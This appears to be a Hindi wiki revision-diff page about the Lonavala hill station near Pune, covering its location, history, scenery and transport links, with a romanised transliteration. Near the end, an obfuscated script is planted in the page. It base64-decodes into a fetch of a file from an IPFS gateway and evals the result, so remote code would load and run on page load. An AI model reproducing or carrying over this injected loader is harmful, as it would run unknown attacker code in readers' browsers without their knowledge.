Difference between revisions of "लोनावाला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Lonavla.jpg|thumb|250px|लोनावाला, [[पुणे]]]]
 
[[चित्र:Lonavla.jpg|thumb|250px|लोनावाला, [[पुणे]]]]
'''लोनावाला''' [[भारत]] के [[महाराष्ट्र]] राज्य के [[पुणे ज़िला|पुणे ज़िले]] का ख़ूबसूरत हिल स्‍टेशन है, जो [[पुणे]] के उत्तर-पश्चिम में स्थित है। लोनावाला को सहाद्रि पहाडियों के मणि के नाम से भी जाना जाता है।  
+
'''लोनावाला''' [[भारत]] के [[महाराष्ट्र]] राज्य में [[पुणे ज़िला|पुणे ज़िले]] का ख़ूबसूरत पहाड़ी क्षेत्र है। यह [[पुणे]] के उत्तर-पश्चिम में स्थित है। लोनावाला को "सहयाद्रि का गहना" नाम से भी जाना जाता है। शांत जलवायु, शांत वातावरण और अचल हवा लोनावाला को छुट्टी बिताने के लिए एक आदर्श स्थान बनाते हैं। यहाँ पर नौसैनिक प्रशिक्षण भी दिया जाता है। पुणे के इस प्रसिद्ध स्थल में पर्यटक प्राचीन बौद्ध मंदिर, भव्‍य क़िले और पहाडियाँ आदि भी देख सकते हैं। शहर की भाग-दौड़ और शोर से दूर पूरे वर्ष भर यह पहाड़ी क्षेत्र अपनी ताजा, प्रदूषण मुक्त वातावरण और सुखद जलवायु के कारण स्वास्थ्य लाभ के लिये प्रसिद्ध है। घरेलू तथा विदेशी पर्यटकों को आकर्षित करने के रूप में सालाना अच्छी आय का साधन भी है।
*लोनावाला समुद्र तल से 625 मीटर की ऊँचाई पर है।
+
==स्थिति==
*लोनावाला भोर घाट दर्रे पर है, इसी दर्रे से होकर पुणे-[[मुम्बई]] रेलमार्ग गुजरता है।  
+
लोनावाला समुद्र तल से 625 मीटर की ऊँचाई पर स्थित है। यह पहाड़ी स्थान भोर घाट दर्रे पर है। इसी दर्रे से होकर पुणे-[[मुम्बई]] रेलमार्ग गुजरता है। लोनावाला पुणे से 64 किलोमीटर और मुम्बई से 96 किलोमीटर की दूरी पर है। यहाँ छोटा-सा शैलावास तथा 'टाटा जलविद्युत योजना' का मुख्यालय भी है।
*यह पुणे से 64 किमी और मुम्बई से 96 किमी की दूरी पर है।
+
====इतिहास====
*लोनावाला में छोटा सा शैलावास भी है तथा यहाँ टाटा जलविद्युत योजना का मुख्यालय भी है।  
+
[[संस्कृत]] के शब्द 'लोनावली' से लोनावाला लिया गया है, जिसका अर्थ होता है- गुफ़ाएँ। प्राचीन समय में लोनावाला में [[यादव वंश|यादव]] राजाओं का शासन था। बाद में [[मुग़ल|मुग़लों]] ने इसे अपने अधिकार में ले लिया। उन्होंने इस क्षेत्र के सामरिक महत्व को समझते हुए लोनावाला पर काफ़ी समय के लिए अपना शासन बनाए रखा। सन [[1871]] में मुम्बई के गवर्नर सर एल्फिसटन ने लोनावाला की खोज की। इसकी खोज के समय यह एक घने जंगल के रूप में था और केवल कुछ मुट्ठी भर लोग ही यहाँ पर बसे हुए थे।
*लोनावाला में नौसैनिक प्रशिक्षण भी दिया जाता है।  
+
==सहयाद्री का गहना==
*पुणे के इस प्रसिद्ध स्थल में पर्यटक प्राचीन बौद्ध मंदिर, भव्‍य क़िले और पहाडियाँ देख सकते हैं।
+
लोनावाला को 'सहयाद्री का गहना' भी कहा जाता है। यह लंबी पैदल यात्रा और ट्रैकिंग के लिए एक लोकप्रिय गंतव्य है। इसके अतिरिक्त इस जगह के साथ कई ऐतिहासिक क़िले, प्राचीन गुफ़ाएँ और आसपास की शांत झीलें जुड़ी हुई हैं। यहाँ की जलवायु भी सुखद है और स्वास्थ्य के लिए लाभदायक है। लोनावाला के एक ओर [[दक्कन का पठार]] और दूसरी ओर [[कोंकण तटीय मैदान|कोंकण तट]] के मनोरम दृश्य हैं। यहाँ की शांति का अनुभव करने के लिए मानसून से बेहतर मौसम कोई नहीं है। यहाँ आस-पास व्यापक झरनें और हरियाली भी है।
 
+
====कैसे पहुँचें====
 +
[[मुम्बई]] और [[पुणे]] से महज एक सौ किलोमीटर दूर, इस छुट्टी के स्थान पर वायुमार्ग, सड़कमार्ग और रेल द्वारा आसानी से पहुँचा जा सकता है। प्रमुख शहरों मुम्बई और पुणे के बीच रेल लाइन पर यह एक प्रमुख ठहराव भी है। यह मुम्बई-पुणे राजमार्ग तथा मुम्बई-पुणे एक्सप्रेस-वे पर स्थित है। पुणे हवाई अड्डा यहाँ का निकटतम हवाई अड्डा है, जो लोनावाला आने में मदद करता है।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 20: Line 21:
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
==संबंधित लेख==
 
==संबंधित लेख==
{{पहाड़ी पर्यटन स्थल}}
+
{{पहाड़ी पर्यटन स्थल}}{{महाराष्ट्र के पर्यटन स्थल}}
{{महाराष्ट्र के पर्यटन स्थल}}
+
[[Category:पुणे]][[Category:महाराष्ट्र]][[Category:महाराष्ट्र के पर्यटन स्थल]][[Category:पर्यटन कोश]]
[[Category:पुणे]]
 
[[Category:महाराष्ट्र]]
 
[[Category:महाराष्ट्र के पर्यटन स्थल]]
 
[[Category:नया पन्ना फ़रवरी-2012]]
 
 
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 11:35, 20 February 2013

[[chitr:Lonavla.jpg|thumb|250px|lonavala, pune]] lonavala bharat ke maharashtr rajy mean pune zile ka khoobasoorat paha di kshetr hai. yah pune ke uttar-pashchim mean sthit hai. lonavala ko "sahayadri ka gahana" nam se bhi jana jata hai. shaant jalavayu, shaant vatavaran aur achal hava lonavala ko chhutti bitane ke lie ek adarsh sthan banate haian. yahaan par nausainik prashikshan bhi diya jata hai. pune ke is prasiddh sthal mean paryatak prachin bauddh mandir, bhavh‍y qile aur pahadiyaan adi bhi dekh sakate haian. shahar ki bhag-dau d aur shor se door poore varsh bhar yah paha di kshetr apani taja, pradooshan mukt vatavaran aur sukhad jalavayu ke karan svasthy labh ke liye prasiddh hai. ghareloo tatha videshi paryatakoan ko akarshit karane ke roop mean salana achchhi ay ka sadhan bhi hai.

sthiti

lonavala samudr tal se 625 mitar ki ooanchaee par sthit hai. yah paha di sthan bhor ghat darre par hai. isi darre se hokar pune-mumbee relamarg gujarata hai. lonavala pune se 64 kilomitar aur mumbee se 96 kilomitar ki doori par hai. yahaan chhota-sa shailavas tatha 'tata jalavidyut yojana' ka mukhyalay bhi hai.

itihas

sanskrit ke shabd 'lonavali' se lonavala liya gaya hai, jisaka arth hota hai- gufaean. prachin samay mean lonavala mean yadav rajaoan ka shasan tha. bad mean mugaloan ne ise apane adhikar mean le liya. unhoanne is kshetr ke samarik mahatv ko samajhate hue lonavala par kafi samay ke lie apana shasan banae rakha. san 1871 mean mumbee ke gavarnar sar elphisatan ne lonavala ki khoj ki. isaki khoj ke samay yah ek ghane jangal ke roop mean tha aur keval kuchh mutthi bhar log hi yahaan par base hue the.

sahayadri ka gahana

lonavala ko 'sahayadri ka gahana' bhi kaha jata hai. yah lanbi paidal yatra aur traikiang ke lie ek lokapriy gantavy hai. isake atirikt is jagah ke sath kee aitihasik qile, prachin gufaean aur asapas ki shaant jhilean ju di huee haian. yahaan ki jalavayu bhi sukhad hai aur svasthy ke lie labhadayak hai. lonavala ke ek or dakkan ka pathar aur doosari or koankan tat ke manoram drishy haian. yahaan ki shaanti ka anubhav karane ke lie manasoon se behatar mausam koee nahian hai. yahaan as-pas vyapak jharanean aur hariyali bhi hai.

kaise pahuanchean

mumbee aur pune se mahaj ek sau kilomitar door, is chhutti ke sthan par vayumarg, s dakamarg aur rel dvara asani se pahuancha ja sakata hai. pramukh shaharoan mumbee aur pune ke bich rel lain par yah ek pramukh thaharav bhi hai. yah mumbee-pune rajamarg tatha mumbee-pune eksapres-ve par sthit hai. pune havaee adda yahaan ka nikatatam havaee adda hai, jo lonavala ane mean madad karata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh